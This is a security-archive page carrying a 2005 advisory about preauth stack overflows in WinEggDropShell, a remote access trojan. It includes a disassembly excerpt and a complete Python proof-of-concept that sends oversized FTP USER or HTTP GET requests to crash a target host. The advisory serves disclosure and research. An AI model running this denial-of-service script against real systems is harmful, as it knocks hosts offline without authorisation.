what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

AD20051202.txt

AD20051202.txt
Posted Dec 3, 2005
Authored by Sowhat | Site secway.org

WinEggDropShell Eternity version 1.7 is susceptible to preauth stack overflows. Proof of concept denial of service exploit included.

tags | exploit, denial of service, overflow, proof of concept
SHA-256 | 2ec95ea1eb4e9a0c406b4c6e8ae0c57a3f64aba3b51d781bc5062ceb434bc713

AD20051202.txt

Change Mirror Download
WinEggDropShell Multiple Remote Stack Overflow

by Sowhat
2005.12.02
https://secway.org/advisory/AD20051202.txt
https://secway.org/exploit/wineggdropshell_bof.py.txt

Affected:

WinEggDropShell Eterntiy version (1.7)
Other version may be vulnerable toooooo


Overview:

WinEggDropShell is a popular Chinese RAT (remote access trojan).
WineggDropShell provide HTTP Proxy/Socks Proxy/HTTP Server/FTP Server.
for more information, Goooooooooooooogle...

Multiple preauth stack overflow found in the HTTP/FTP server can be used to
execute arbitrary command or D0S (blue screen, yes, it's cool ;)


Vulnerability:


1. FTP USER bof

.text:100027BD push offset aUser ; "USER"
.text:100027C2 call _strlen
.text:100027C7 add esp, 4
.text:100027CA lea edi, [ebp+eax-103h]
.text:100027D1 push edi
.text:100027D2 push offset aS ; "%s"
.text:100027D7 lea edi, [ebp+var_208]
.text:100027DD push edi ; char *
.text:100027DE call _sprintf ; emmmmm, ;)


_ReceiveSocketBuffer can maximum recv 0x200h, but [ebp+var_208] is
a 0x104h buffer.

2. FTP Server Pass Command
.............


3. HTTP GET stack overflow!
GET /A*260


PoC:
https://secway.org/exploit/wineggdropshell_bof.py.txt


Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;)

Reference:
[1] https://www.openrce.org/articles/full_view/18
[2] https://www.ccc.de/congress/2005/
[3] https://secway.org

#!/usr/bin/python
# WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC
# HTTP Server "GET" && FTP Server "USER" "PASS" command
# Bug Discoverd and coded by Sowhat
# Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;)
# https://secway.org
# 2005-10-11

# Affected:
# WinEggDropShell Eterntiy version
# Other version may be vulnerable toooooo

import sys
import string
import socket

if (len(sys.argv) != 4):

print "##########################################################################"
print "# WinEggDropShell Multipe PreAuth Remote Stack Overflow
PoC #"
print "# This Poc will BOD the vulnerable target
#"
print "# Bug Discoverd and coded by Sowhat
#"
print "# https://secway.org
#"
print "##########################################################################"
print "\nUsage: " + sys.argv[0] + "HTTP/FTP" + " TargetIP" + " Port\n"
print "Example: \n" + sys.argv[0] + " HTTP" + " 1.1.1.1" + " 80"
print sys.argv[0] + " FTP" + " 1.1.1.1" + " 21"
sys.exit(0)

host = sys.argv[2]
port = string.atoi(sys.argv[3])

if ((sys.argv[1] == "FTP") | (sys.argv[1] == "ftp")):

request = "USER " + 'A'*512 + "\r"

if ((sys.argv[1] == "HTTP") | (sys.argv[1] == "http")):

request = "GET /" + 'A'*512 + " HTTP/1.1 \r\n"

exp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
exp.connect((host,port))
exp.send(request)



---EOF-----



--
Sowhat
https://secway.org
"Life is like a bug, Do you know how to exploit it ?"
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close